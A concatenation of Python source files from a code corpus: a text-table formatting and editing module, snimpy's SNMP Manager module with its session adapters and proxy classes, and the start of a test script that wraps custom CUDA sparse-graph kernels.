total_col_len = (self.col_len
+ (self.colspan - 1)
+ sum([col.col_len for col in self.pseudo_columns]))
#if self.syntax.multi_markdown_syntax():
# total_col_len = total_col_len - (self.colspan - 1)
total_col_len = (total_col_len
# left border already calculated
# - (len(self.left_border_text) - 1)
- (len(self.right_border_text) - 1))
norm = self._norm()
space_len = len(self.left_space) + len(self.right_space)
total_align_len = total_col_len - wcount(norm)
if self.header and self.syntax.detect_header:
align_value = norm.center(total_align_len - space_len, ' ')
elif self.align == Column.ALIGN_RIGHT:
align_value = norm.rjust(total_align_len - space_len, ' ')
elif self.align == Column.ALIGN_CENTER:
align_value = norm.center(total_align_len - space_len, ' ')
else:
align_value = norm.ljust(total_align_len - space_len, ' ')
return self.left_space + align_value + self.right_space
def check_condition(condition, message):
if not condition:
raise TableException(message)
class TextTable:
def __init__(self, syntax):
self.syntax = syntax
self.prefix = ""
self.rows = []
self.pack()
def __len__(self):
return len(self.rows)
def empty(self):
return len(self.rows) == 0
def __getitem__(self, index):
return self.rows[index]
def _max_column_count(self):
return max([len(row) for row in self.rows])
def _rstrip(self):
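        # Part of intelligent formatting: when exactly one data row is longer
        # than the rest because of colspans, drop its trailing empty columns
        # so that single row does not force extra columns onto the whole table.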
if len(self.rows) <= 1:
return
max_column_count = self._max_column_count()
long_lines_count = 0
long_line_ind = 0
for row_ind, row in enumerate(self.rows):
if len(row) == max_column_count:
long_lines_count += 1
long_line_ind = row_ind
if long_lines_count == 1:
row = self.rows[long_line_ind]
overspans = sum([column.colspan - 1 for column in row.columns])
if row.is_data() and overspans > 0:
shift = 0
for shift, column in enumerate(row[::-1]):
if column.pseudo() or len(column.data.strip()) > 0:
break
if shift > 0:
if len(self.rows) == 2:
if shift != overspans:
return
row.columns = row.columns[:-shift]
def pack(self):
if len(self.rows) == 0:
return
column_count = self._max_column_count()
if column_count == 0:
self.rows = []
return
#intelligent formatting
if self.syntax.intelligent_formatting:
self._rstrip()
column_count = self._max_column_count()
#adjust/extend column count
rowspans = [0] * column_count
for row in self.rows:
overcols = sum([rowspan for rowspan in rowspans if rowspan > 0])
diff_count = column_count - len(row) - overcols
for i in range(diff_count):
row.columns.append(row.new_empty_column())
if len(row) == 0:
row.columns.append(row.new_empty_column())
#prepare rowspans for next row
for col_ind, rowspan in enumerate(rowspans):
if rowspan > 0:
rowspans[col_ind] = rowspans[col_ind] - 1
for col_ind, column in enumerate(row.columns):
rowspans[col_ind] = rowspans[col_ind] + column.rowspan - 1
#calculate column lens
col_lens = [0] * column_count
for row in self.rows:
for col_ind, column in enumerate(row.columns):
col_lens[col_ind] = max(col_lens[col_ind], column.min_len())
#set column len
for row in self.rows:
for column, col_len in zip(row.columns, col_lens):
column.col_len = col_len
#header
header_separator_index = -1
first_data_index = -1
if self.syntax.detect_header:
for row_ind, row in enumerate(self.rows):
if first_data_index == -1 and row.is_data():
first_data_index = row_ind
if (first_data_index != -1 and header_separator_index == -1
and row.is_header_separator()):
header_separator_index = row_ind
for header_index in range(first_data_index, header_separator_index):
if self.rows[header_index].is_data():
for column in self.rows[header_index].columns:
column.header = True
#set column alignment
data_alignment = [None] * len(col_lens)
for row_ind, row in enumerate(self.rows):
if row_ind < header_separator_index:
if row.is_align():
for col_ind, column in enumerate(row.columns):
data_alignment[col_ind] = column.align_follow()
continue
elif row.is_align():
for col_ind, column in enumerate(row.columns):
data_alignment[col_ind] = column.align_follow()
elif row.is_data():
for col_ind, column in enumerate(row.columns):
if data_alignment[col_ind] is None:
if self.syntax.align_number_right and self._is_number_column(row_ind, col_ind):
data_alignment[col_ind] = Column.ALIGN_RIGHT
else:
data_alignment[col_ind] = Column.ALIGN_LEFT
column.align = data_alignment[col_ind]
def _is_number_column(self, start_row_ind, col_ind):
assert self.rows[start_row_ind].is_data()
for row in self.rows[start_row_ind:]:
if (row.is_data()
and col_ind < len(row.columns)
and len(row.columns[col_ind].data.strip()) > 0):
try:
float(row.columns[col_ind].data)
except ValueError:
return False
return True
def render_lines(self):
return [self.prefix + row.render() for row in self.rows]
def render(self):
return "\n".join(self.render_lines())
def is_col_colspan(self, col):
for row in self.rows:
if col < len(row):
if row[col].pseudo() or row[col].colspan > 1:
return True
return False
def is_row_colspan(self, row):
for column in self[row].columns:
if column.pseudo() or column.colspan > 1:
return True
return False
def assert_not_col_colspan(self, col):
check_condition(self.is_col_colspan(col) is False,
"Expected not colspan column, but column {0}"
" is colspan".format(col))
def delete_column(self, col):
self.assert_not_col_colspan(col)
for row in self.rows:
if col < len(row):
del row.columns[col]
self.pack()
def swap_columns(self, i, j):
self.assert_not_col_colspan(i)
self.assert_not_col_colspan(j)
for row in self.rows:
if i < len(row) and j < len(row):
row.columns[i], row.columns[j] = row.columns[j], row.columns[i]
self.pack()
def delete_row(self, i):
assert 0 <= i < len(self.rows)
del self.rows[i]
self.pack()
def swap_rows(self, i, j):
check_condition((0 <= i < len(self.rows) and
0 <= j < len(self.rows)),
"Index out of range")
self.rows[i], self.rows[j] = self.rows[j], self.rows[i]
for column in self.rows[i].columns:
column.header = False
for column in self.rows[j].columns:
column.header = False
self.pack()
def insert_empty_row(self, i):
check_condition(i >= 0, "Index should be more than zero")
self.rows.insert(i, DataRow(self))
self.pack()
def insert_empty_column(self, i):
check_condition(i >= 0, "Index should be more than zero")
self.assert_not_col_colspan(i)
for row in self.rows:
row.columns.insert(i, row.new_empty_column())
self.pack()
class TableException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class TablePos:
def __init__(self, row_num, field_num):
self.row_num = row_num
self.field_num = field_num
def __repr__(self):
return "TablePos({self.row_num}, {self.field_num})".format(self=self)
def __str__(self):
return self.__repr__()
def __eq__(self, other):
return (self.row_num == other.row_num
and self.field_num == other.field_num)
class TableDriver:
def __init__(self, syntax):
self.syntax = syntax
def visual_column_count(self, table, row_ind):
return sum([1 for column in table[row_ind].columns
if not column.pseudo()])
def internal_to_visual_index(self, table, internal_pos):
visual_pos = TablePos(internal_pos.row_num, internal_pos.field_num)
for col_ind in range(internal_pos.field_num + 1):
if table[internal_pos.row_num][col_ind].pseudo():
visual_pos.field_num -= 1
return visual_pos
def visual_to_internal_index(self, table, visual_pos):
internal_pos = TablePos(visual_pos.row_num, 0)
count_visual = 0
internal_pos.field_num = 0
for col_ind in range(len(table[visual_pos.row_num])):
if not table[visual_pos.row_num][col_ind].pseudo():
count_visual += 1
internal_pos.field_num = col_ind
if count_visual == visual_pos.field_num + 1:
break
else:
print("WARNING: Visual Index Not found")
return internal_pos
def get_cursor(self, table, visual_pos):
#
# ' | 1 | 2 | 3_| 4 |'
internal_pos = self.visual_to_internal_index(table, visual_pos)
base_len = (len(table.prefix)
+ sum([column.col_len - wcount(column.render()) for column, ind
in zip(table[visual_pos.row_num].columns,
range(internal_pos.field_num))])
+ internal_pos.field_num + 1 # count of '|'
)
text = table[internal_pos.row_num][internal_pos.field_num].render()
match = re.search(r"([^\s])\s*$", text)
if match:
col_pos = match.end(1)
else:
col_pos = 1
return base_len + col_pos
def editor_move_column_left(self, table, table_pos):
internal_pos = self.visual_to_internal_index(table, table_pos)
field_num = internal_pos.field_num
if field_num > 0:
if (table.is_col_colspan(field_num) or
table.is_col_colspan(field_num - 1)):
raise TableException("Move Column Left is not "
"permitted for colspan column")
else:
table.swap_columns(field_num, field_num - 1)
return ("Column moved to left",
TablePos(table_pos.row_num, table_pos.field_num - 1))
else:
raise TableException("Move Column Left doesn't "
"make sence for the first column in the "
"table.")
def editor_move_column_right(self, table, table_pos):
internal_pos = self.visual_to_internal_index(table, table_pos)
field_num = internal_pos.field_num
if field_num < len(table[table_pos.row_num]) - 1:
if (table.is_col_colspan(field_num) or
table.is_col_colspan(field_num + 1)):
raise TableException("Move Column Right is not "
"permitted for colspan column")
else:
table.swap_columns(field_num, field_num + 1)
return ("Column moved to right",
TablePos(table_pos.row_num, table_pos.field_num + 1))
else:
raise TableException("Move Column Right doesn't "
"make sense for the last column in the "
"table.")
def editor_move_row_up(self, table, table_pos):
if table_pos.row_num > 0:
table.swap_rows(table_pos.row_num, table_pos.row_num - 1)
return("Row moved up",
TablePos(table_pos.row_num - 1, table_pos.field_num))
else:
raise TableException("Move Row Up doesn't make sense for the "
"first row in the table")
def editor_move_row_down(self, table, table_pos):
if table_pos.row_num + 1 < len(table):
table.swap_rows(table_pos.row_num, table_pos.row_num + 1)
return ("Row moved down",
TablePos(table_pos.row_num + 1, table_pos.field_num))
else:
raise TableException("Move Row Down doesn't make sense for the "
"last row in the table")
def editor_next_row(self, table, table_pos):
if table_pos.row_num + 1 < len(table):
if table[table_pos.row_num + 1].is_header_separator():
table.insert_empty_row(table_pos.row_num + 1)
else:
table.insert_empty_row(len(table))
return ("Moved to next row",
TablePos(table_pos.row_num + 1, table_pos.field_num))
def editor_delete_column(self, table, table_pos):
internal_pos = self.visual_to_internal_index(table, table_pos)
field_num = internal_pos.field_num
if table.is_col_colspan(field_num):
raise TableException("Delete column is not permitted for "
"colspan column")
else:
table.delete_column(field_num)
new_table_pos = TablePos(table_pos.row_num,
table_pos.field_num)
if (not table.empty() and
table_pos.field_num == len(table[table_pos.row_num])):
new_table_pos.field_num = new_table_pos.field_num - 1
return("Column deleted", new_table_pos)
def editor_insert_column(self, table, table_pos):
internal_pos = self.visual_to_internal_index(table, table_pos)
field_num = internal_pos.field_num
if table.is_col_colspan(field_num):
raise TableException("Insert column is not permitted for "
"colspan column")
else:
table.insert_empty_column(field_num)
return ("Column inserted",
TablePos(table_pos.row_num, table_pos.field_num))
def editor_kill_row(self, table, table_pos):
table.delete_row(table_pos.row_num)
new_table_pos = TablePos(table_pos.row_num, table_pos.field_num)
if table_pos.row_num == len(table):
new_table_pos.row_num = new_table_pos.row_num - 1
return ("Row deleted", new_table_pos)
def editor_insert_row(self, table, table_pos):
table.insert_empty_row(table_pos.row_num)
return ("Row inserted",
TablePos(table_pos.row_num, table_pos.field_num))
def editor_insert_single_hline(self, table, table_pos):
raise TableException("Syntax {0} doesn't support insert single line"
.format(self.syntax.name))
def editor_insert_double_hline(self, table, table_pos):
raise TableException("Syntax {0} doesn't support insert double line"
.format(self.syntax.name))
def editor_insert_hline_and_move(self, table, table_pos):
raise TableException("Syntax {0} doesn't support insert single line "
"and move".format(self.syntax.name))
def editor_align(self, table, table_pos):
return ("Table aligned",
TablePos(table_pos.row_num, table_pos.field_num))
def editor_join_lines(self, table, table_pos):
if (table_pos.row_num + 1 < len(table)
and table[table_pos.row_num].is_data()
and table[table_pos.row_num + 1].is_data()
and not table.is_row_colspan(table_pos.row_num)
and not table.is_row_colspan(table_pos.row_num + 1)):
for curr_col, next_col in zip(table[table_pos.row_num].columns,
table[table_pos.row_num + 1].columns):
curr_col.data = curr_col.data.strip() + " " + next_col.data.strip()
table.delete_row(table_pos.row_num + 1)
return ("Rows joined",
TablePos(table_pos.row_num, table_pos.field_num))
else:
raise TableException("Join columns is not permitted")
def editor_next_field(self, table, table_pos):
pos = TablePos(table_pos.row_num, table_pos.field_num)
moved = False
while True:
if table[pos.row_num].is_separator():
if pos.row_num + 1 < len(table):
pos.field_num = 0
pos.row_num += 1
moved = True
continue
else:
#sel_row == last_table_row
table.insert_empty_row(len(table))
pos.field_num = 0
pos.row_num += 1
break
elif moved:
break
elif pos.field_num + 1 < self.visual_column_count(table, pos.row_num):
pos.field_num += 1
break
elif pos.row_num + 1 < len(table):
pos.field_num = 0
pos.row_num += 1
moved = True
continue
else:
#sel_row == last_table_row
table.insert_empty_row(len(table))
pos.field_num = 0
pos.row_num += 1
break
return ("Cursor position changed", pos)
def editor_previous_field(self, table, table_pos):
pos = TablePos(table_pos.row_num, table_pos.field_num)
moved = False
while True:
if table[pos.row_num].is_separator():
if pos.row_num > 0:
pos.row_num -= 1
pos.field_num = self.visual_column_count(table, pos.row_num) - 1
moved = True
continue
else:
#row_num == 0
pos.field_num = 0
break
elif moved:
break
elif pos.field_num > 0:
pos.field_num -= 1
break
elif pos.row_num > 0:
pos.row_num -= 1
pos.field_num = self.visual_column_count(table, pos.row_num) - 1
moved = True
continue
else:
#row_num == 0
break
return ("Cursor position changed", pos)
def parse_csv(self, text):
try:
table = TextTable(self.syntax)
dialect = csv.Sniffer().sniff(text)
table_reader = csv.reader(text.splitlines(), dialect)
for cols in table_reader:
row = DataRow(table)
for col in cols:
row.columns.append(DataColumn(row, col))
table.rows.append(row)
except csv.Error:
table = TextTable(self.syntax)
for line in text.splitlines():
row = DataRow(table)
row.columns.append(DataColumn(row, line))
table.rows.append(row)
table.pack()
return table
class BaseTableParser:
def __init__(self, syntax):
self.syntax = syntax
def parse_row(self, table, line):
row = self.create_row(table, line)
for line_cell in line.cells:
column = self.create_column(table, row, line_cell)
row.append(column)
return row
def create_row(self, table, line):
raise NotImplementedError
def create_column(self, table, row, line_cell):
column = row.create_column(line_cell.text)
column.left_border_text = line_cell.left_border_text
column.right_border_text = line_cell.right_border_text
return column
def is_table_row(self, row):
return re.match(r"^\s*[|+]",row) is not None
def parse_text(self, text):
table = TextTable(self.syntax)
lines = text.splitlines()
for ind, line in enumerate(lines):
line = self.syntax.line_parser.parse(line)
if ind == 0:
table.prefix = line.prefix
row = self.parse_row(table, line)
table.rows.append(row)
table.pack()
return table
|
snimpy/manager.py | vincentbernat/snimpy | 129 | 12652874 | #
# snimpy -- Interactive SNMP tool
#
# Copyright (C) <NAME> <<EMAIL>>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
"""This module is the high-level interface to *Snimpy*. It exposes
the :class:`Manager` class, which is used to instantiate a new manager (an
SNMP client). This is the preferred interface for *Snimpy*.
Here is a simple example of use of this module::
>>> load("IF-MIB")
>>> m = Manager("localhost")
>>> m.ifDescr[1]
<String: lo>
"""
import inspect
from time import time
from collections.abc import MutableMapping, Container, Iterable, Sized
from snimpy import snmp, mib, basictypes
class DelegatedSession:
"""General class for SNMP session for delegation"""
def __init__(self, session):
self._session = session
def __getattr__(self, attr):
return getattr(self._session, attr)
def __setattribute__(self, attr, value):
return setattr(self._session, attr, value)
class DelayedSetSession(DelegatedSession):
"""SNMP session that is able to delay SET requests.
This is an adapter. The constructor takes the original (not
delayed) session.
"""
def __init__(self, session):
DelegatedSession.__init__(self, session)
self.setters = []
def set(self, *args):
self.setters.extend(args)
def commit(self):
if self.setters:
self._session.set(*self.setters)
class NoneSession(DelegatedSession):
"""SNMP session that will return None on unsucessful GET requests.
In a normal session, a GET request returning `No such instance`
error will trigger an exception. This session will catch such an
error and return None instead.
"""
def get(self, *args):
try:
return self._session.get(*args)
except (snmp.SNMPNoSuchName,
snmp.SNMPNoSuchObject,
snmp.SNMPNoSuchInstance):
if len(args) > 1:
# We can't handle this case yet because we don't know
# which value is unavailable.
raise
return ((args[0], None),)
class CachedSession(DelegatedSession):
"""SNMP session using a cache.
This is an adapter. The constructor takes the original session.
"""
def __init__(self, session, timeout=5):
DelegatedSession.__init__(self, session)
self.cache = {} # contains (operation, oid) -> [time, result] entries
self.timeout = timeout
self.count = 0
def getorwalk(self, op, *args):
self.count += 1
if (op, args) in self.cache:
t, v = self.cache[op, args]
if time() - t < self.timeout:
return v
value = getattr(self._session, op)(*args)
self.cache[op, args] = [time(), value]
if op == "walkmore":
# also cache all the get requests we got for free
for oid, get_value in value:
self.count += 1
self.cache["get", (oid, )] = [time(), ((oid, get_value), )]
self.flush()
return value
def get(self, *args):
return self.getorwalk("get", *args)
def walk(self, *args):
assert(len(args) == 1) # we should ony walk one oid at a time
return self.getorwalk("walkmore", *args)
def flush(self):
keys = list(self.cache.keys())
for k in keys:
if time() - self.cache[k][0] > self.timeout:
del self.cache[k]
self.count = 0
def MibRestrictedManager(original, mibs):
"""Copy an existing manager but restrict its view to the given set of
MIBs.
"""
clone = Manager(**original._constructor_args)
clone._loaded = mibs
return clone
class Manager:
"""SNMP manager. An instance of this class will represent an SNMP
manager (client).
When a MIB is loaded with :func:`load`, scalars and row names from
it will be made available as an instance attribute. For a scalar,
reading the corresponding attribute will get its value while
setting it will allow to modify it:
>>> load("SNMPv2-MIB")
>>> m = Manager("localhost", "private")
>>> m.sysContact
<String: root>
>>> m.sysContact = "<NAME>"
>>> m.sysContact
<String: <NAME>>
For a row name, the provided interface is like a Python
dictionary. Requesting an item using its index will retrieve the
value from the agent (the server)::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> m.ifDescr[1]
<String: lo>
>>> m.ifName[1] = "Loopback interface"
Also, it is possible to iterate on a row name to get all available
values for index::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> for idx in m.ifDescr:
... print(m.ifDescr[idx])
You can get a slice of index values from a table by iterating on
a row name subscripted by a partial index::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> for idx in m.ipNetToMediaPhysAddress[1]:
... print(idx)
(<Integer: 1>, <IpAddress: 127.0.0.1>)
You can use multivalue indexes in two ways: using Pythonic
multi-dimensional dict syntax, or by providing a tuple containing
index values::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> m.ipNetToMediaPhysAddress[1]['127.0.0.1']
<String: aa:bb:cc:dd:ee:ff>
>>> m.ipNetToMediaPhysAddress[1, '127.0.0.1']
<String: aa:bb:cc:dd:ee:ff>
A context manager is also provided. Any modification issued inside
the context will be delayed until the end of the context and then
grouped into a single SNMP PDU to be executed atomically::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> with m:
... m.ifName[1] = "Loopback interface"
... m.ifName[2] = "First interface"
Any error will be turned into an exception::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> m.ifDescr[999]
Traceback (most recent call last):
...
SNMPNoSuchName: There is no such variable name in this MIB.
"""
# do we want this object to be populated with all nodes?
_complete = False
def __init__(self,
host="localhost",
community="public", version=2,
cache=False, none=False,
timeout=None, retries=None,
loose=False, bulk=40,
# SNMPv3
secname=None,
authprotocol=None, authpassword=<PASSWORD>,
privprotocol=None, privpassword=<PASSWORD>,
contextname=None):
"""Create a new SNMP manager. Some of the parameters are explained in
:meth:`snmp.Session.__init__`.
:param host: The hostname or IP address of the agent to
connect to. Optionally, the port can be specified
separated with a double colon.
:type host: str
:param community: The community to transmit to the agent for
authorization purpose. This parameter is ignored if the
specified version is 3.
:type community: str
:param version: The SNMP version to use to talk with the
agent. Possible values are `1`, `2` (community-based) or
`3`.
:type version: int
:param cache: Should caching be enabled? This can be either a
boolean or an integer to specify the cache timeout in
seconds. If `True`, the default timeout is 5 seconds.
:type cache: bool or int
:param none: Should `None` be returned when the agent does not
know the requested OID? If `True`, `None` will be returned
            when requesting a nonexistent scalar or column.
:type none: bool
:param timeout: Use the specified value in seconds as timeout.
:type timeout: int
:param retries: How many times the request should be retried?
:type retries: int
:param loose: Enable loose typing. When type coercion fails
(for example when a MIB declare an element to be an ASCII
string while it is not), just return the raw result
instead of an exception. This mode should be enabled with
caution. Patching the MIB is a better idea.
:type loose: bool
:param bulk: Max-repetition to use to speed up MIB walking
with `GETBULK`. Set to `0` to disable.
:type bulk: int
"""
if host is None:
host = Manager._host
self._host = host
self._session = snmp.Session(host, community, version,
secname,
authprotocol, authpassword,
privprotocol, privpassword,
contextname=contextname,
bulk=bulk)
if timeout is not None:
self._session.timeout = int(timeout * 1000000)
if retries is not None:
self._session.retries = retries
if cache:
if cache is True:
self._session = CachedSession(self._session)
else:
self._session = CachedSession(self._session, cache)
if none:
self._session = NoneSession(self._session)
self._loose = loose
self._loaded = loaded
# To be able to clone, we save the arguments provided to the
# constructor in a generic way
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
self._constructor_args = {a: values[a]
for a in args
if a != 'self'}
def _locate(self, attribute):
for m in self._loaded:
try:
a = mib.get(m, attribute)
return (m, a)
except mib.SMIException:
pass
raise AttributeError("{} not found in any MIBs".format(attribute))
def __getattribute__(self, attribute):
if attribute.startswith("_"):
return object.__getattribute__(self, attribute)
m, a = self._locate(attribute)
if isinstance(a, mib.Scalar):
oid, result = self._session.get(a.oid + (0,))[0]
if result is not None:
try:
return a.type(a, result)
except ValueError:
if self._loose:
return result
raise
return None
elif isinstance(a, mib.Column):
return ProxyColumn(self._session, a, self._loose)
elif isinstance(a, mib.Table):
return ProxyTable(self._session, a, self._loose)
raise NotImplementedError
def __setattr__(self, attribute, value):
if attribute.startswith("_"):
return object.__setattr__(self, attribute, value)
m, a = self._locate(attribute)
if not isinstance(value, basictypes.Type):
value = a.type(a, value, raw=False)
if isinstance(a, mib.Scalar):
self._session.set(a.oid + (0,), value)
return
raise AttributeError("{} is not writable".format(attribute))
def __getitem__(self, modulename):
modulename = modulename.encode('ascii')
for m in loaded:
if modulename == m:
return MibRestrictedManager(self, [m])
raise KeyError("{} is not a loaded module".format(modulename))
def __repr__(self):
return "<Manager for {}>".format(self._host)
def __enter__(self):
"""In a context, we group all "set" into a single request"""
self._osession = self._session
self._session = DelayedSetSession(self._session)
return self
def __exit__(self, type, value, traceback):
"""When we exit, we should execute all "set" requests"""
try:
if type is None:
self._session.commit()
finally:
self._session = self._osession
del self._osession
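# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example of how a Manager is typically used, following the class
# docstring above; the MIB name, host and community strings are placeholders.
def _example_manager_usage():  # pragma: no cover
    load("IF-MIB")
    m = Manager("localhost", "public")
    descr = m.ifDescr[1]                 # read one entry of a column
    names = dict(m.ifName.iteritems())   # walk a whole column
    with Manager("localhost", "private") as mw:
        # Inside a context manager all "set" operations are grouped into a
        # single request and committed on exit (see __enter__/__exit__ above).
        mw.ifName[1] = "Loopback interface"
    return descr, names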
class Proxy:
"""A proxy for some base type, notably a column or a table."""
def __repr__(self):
return "<{} for {}>".format(self.__class__.__name__,
repr(self.proxy)[1:-1])
class ProxyIter(Proxy, Sized, Iterable, Container):
"""Proxy for an iterable sequence.
    This is a proxy offering the ABC of an iterable sequence (something
like a set but without set operations). This will be used by both
`ProxyColumn` and `ProxyTable`.
"""
def _op(self, op, index, *args):
if not isinstance(index, tuple):
index = (index,)
indextype = self.proxy.table.index
if len(indextype) != len(index):
raise ValueError(
"{} column uses the following "
"indexes: {!r}".format(self.proxy, indextype))
oidindex = []
for i, ind in enumerate(index):
# Cast to the correct type since we need "toOid()"
ind = indextype[i].type(indextype[i], ind, raw=False)
implied = self.proxy.table.implied and i == len(index)-1
oidindex.extend(ind.toOid(implied))
result = getattr(
self.session,
op)(self.proxy.oid + tuple(oidindex),
*args)
if op != "set":
oid, result = result[0]
if result is not None:
try:
return self.proxy.type(self.proxy, result)
except ValueError:
if self._loose:
return result
raise
return None
def __contains__(self, object):
try:
self._op("get", object)
except Exception:
return False
return True
def __iter__(self):
for k, _ in self.iteritems():
yield k
def __len__(self):
        return len(list(self.iteritems()))
def items(self, *args, **kwargs):
return self.iteritems(*args, **kwargs)
def iteritems(self, table_filter=None):
count = 0
oid = self.proxy.oid
indexes = self.proxy.table.index
if table_filter is not None:
if len(table_filter) >= len(indexes):
raise ValueError("Table filter has too many elements")
oid_suffix = []
# Convert filter elements to correct types
for i, part in enumerate(table_filter):
part = indexes[i].type(indexes[i], part, raw=False)
# implied = False:
# index never includes last element
# (see 'len(table_filter) >= len(indexes)')
oid_suffix.extend(part.toOid(implied=False))
oid += tuple(oid_suffix)
walk_oid = oid
for noid, result in self.session.walk(oid):
if noid <= oid:
noid = None
break
oid = noid
if not(len(oid) >= len(walk_oid) and
oid[:len(walk_oid)] ==
walk_oid[:len(walk_oid)]):
noid = None
break
# oid should be turned into index
index = tuple(oid[len(self.proxy.oid):])
target = []
for i, x in enumerate(indexes):
implied = self.proxy.table.implied and i == len(indexes)-1
l, o = x.type.fromOid(x, index, implied)
target.append(x.type(x, o))
index = index[l:]
count = count + 1
if result is not None:
try:
result = self.proxy.type(self.proxy, result)
except ValueError:
if not self._loose:
raise
if len(target) == 1:
# Should work most of the time
yield target[0], result
else:
yield tuple(target), result
if count == 0:
# We did not find any element. Is it because the column is
            # empty or because the column does not exist? We do an SNMP
# GET to know. If we get a "No such instance" exception,
# this means the column is empty. If we get "No such
# object", this means the column does not exist. We cannot
# make such a distinction with SNMPv1.
try:
self.session.get(self.proxy.oid)
except snmp.SNMPNoSuchInstance:
                # OK, the set of results is really empty
return
except snmp.SNMPNoAccess:
# Some implementations seem to return NoAccess (PySNMP is one)
return
except snmp.SNMPNoSuchName:
# SNMPv1, we don't know
pass
except snmp.SNMPNoSuchObject:
# The result is empty because the column is unknown
raise
class ProxyTable(ProxyIter):
"""Proxy for table access.
    We just use the first accessible column of the table. However, the mapping
operations are not available.
"""
def __init__(self, session, table, loose):
self.proxy = None
for column in table.columns:
if column.accessible:
self.proxy = column
break
if self.proxy is None:
raise NotImplementedError("No accessible column in the table.")
self.session = session
self._loose = loose
class ProxyColumn(ProxyIter, MutableMapping):
"""Proxy for column access"""
def __init__(self, session, column, loose, oid_suffix=()):
self.proxy = column
self.session = session
self._loose = loose
self._oid_suffix = oid_suffix
def __getitem__(self, index):
# If supplied index is partial we return new ProxyColumn
# with appended OID suffix
idx_len = len(self.proxy.table.index)
suffix_len = len(self._oid_suffix)
if isinstance(index, tuple):
if len(index) + suffix_len < idx_len:
return self._partial(index)
elif idx_len > suffix_len + 1:
return self._partial((index,))
# Otherwise a read op is made
if not isinstance(index, tuple):
index = (index,)
return self._op("get", self._oid_suffix + index)
def __setitem__(self, index, value):
if not isinstance(value, basictypes.Type):
value = self.proxy.type(self.proxy, value, raw=False)
if not isinstance(index, tuple):
index = (index,)
self._op("set", self._oid_suffix + index, value)
def __delitem__(self, index):
raise NotImplementedError("cannot suppress a column")
def __contains__(self, index):
if not isinstance(index, tuple):
index = (index,)
return ProxyIter.__contains__(self, self._oid_suffix + index)
def _partial(self, index):
"""Create new ProxyColumn based on current one,
but with appended OID suffix"""
new_suffix = self._oid_suffix + index
return ProxyColumn(self.session, self.proxy, self._loose, new_suffix)
def items(self, *args, **kwargs):
return self.iteritems(*args, **kwargs)
def iteritems(self, table_filter=None):
resulting_filter = self._oid_suffix
if table_filter is not None:
if not isinstance(table_filter, tuple):
table_filter = (table_filter,)
resulting_filter += table_filter
return ProxyIter.iteritems(self, resulting_filter)
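# --- Illustrative sketch (not part of the original module) ---
# ProxyColumn.__getitem__ above returns a *narrowed* ProxyColumn when fewer
# index components are supplied than the table declares. The column name below
# is hypothetical; any column whose table has a multi-part index would work.
def _example_partial_index(manager):  # pragma: no cover
    column = manager.someMultiIndexedColumn
    sub = column[4]                   # partial index -> narrowed ProxyColumn
    for index, value in sub.iteritems():
        print(index, value)           # only rows whose first index part is 4
    return sub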
loaded = []
def load(mibname):
"""Load a MIB in memory.
:param mibname: MIB name or filename
:type mibname: str
"""
m = mib.load(mibname)
if m not in loaded:
loaded.append(m)
if Manager._complete:
for o in mib.getScalars(m) + \
mib.getColumns(m) + \
mib.getTables(m):
setattr(Manager, str(o), 1)
|
graph_kernel/test.py | rcmckee/BPT | 123 | 12652880 | import torch as th
from graphop import *
from torch.autograd import Function
from part_csr import partition_csr
chunk_size = 32
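# Descriptive note (added): this script benchmarks and sanity-checks the
# custom CUDA kernels exposed by `graphop` against plain PyTorch
# implementations. Each autograd.Function below wraps one forward/backward
# kernel pair:
#   * SparseSoftmax - softmax over edge values grouped per row segment
#   * MaskedMMCSR   - per-edge dot products of source/destination features,
#                     driven by row-wise (CSR) and column-wise layouts
#   * NodeMulEdge   - per-edge product of node features with edge features
#   * VectorSPMM    - edge-weighted sparse matrix x dense matrix product
# The __main__ section times each variant and asserts numerical agreement.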
class SparseSoftmax(Function):
@staticmethod
def forward(ctx, row, indptr, eid, x):
y = sparse_softmax_forward(row, indptr, eid, x)
ctx.save_for_backward(row, indptr, eid, y)
return y
@staticmethod
def backward(ctx, dy):
row, indptr, eid, y = ctx.saved_tensors
return None, None, None, sparse_softmax_backward(row, indptr, eid, y, dy)
class MaskedMMCSR(Function):
@staticmethod
def forward(ctx, row, indptr_r, eid_r, indices_r, col, indptr_c, eid_c, indices_c, A, B):
ctx.save_for_backward(row, indptr_r, eid_r, indices_r, col, indptr_c, eid_c, indices_c, A, B)
return maskedmm_csr_forward(row, indptr_r, eid_r, indices_r, A, B)
@staticmethod
def backward(ctx, grad):
row, indptr_r, eid_r, indices_r, col, indptr_c, eid_c, indices_c, A, B = ctx.saved_tensors
dA, dB = maskedmm_csr_backward(row, indptr_r, eid_r, indices_r, col, indptr_c, eid_c, indices_c, A, B, grad)
return None, None, None, None, None, None, None, None, dA, dB
class NodeMulEdge(Function):
@staticmethod
def forward(ctx, row, indptr, eid, A, B):
ctx.save_for_backward(row, indptr, eid, A, B)
return node_mul_edge_forward(row, indptr, eid, A, B)
@staticmethod
def backward(ctx, grad):
row, indptr, eid, A, B = ctx.saved_tensors
dA, dB = node_mul_edge_backward(row, indptr, eid, A, B, grad)
return None, None, None, dA, dB
class VectorSPMM(Function):
@staticmethod
def forward(ctx, row, indptr, eid, indices, col, ptr_t, eid_t, indices_t, edata, x):
y = vector_spmm_forward(row, indptr, eid, indices, edata, x)
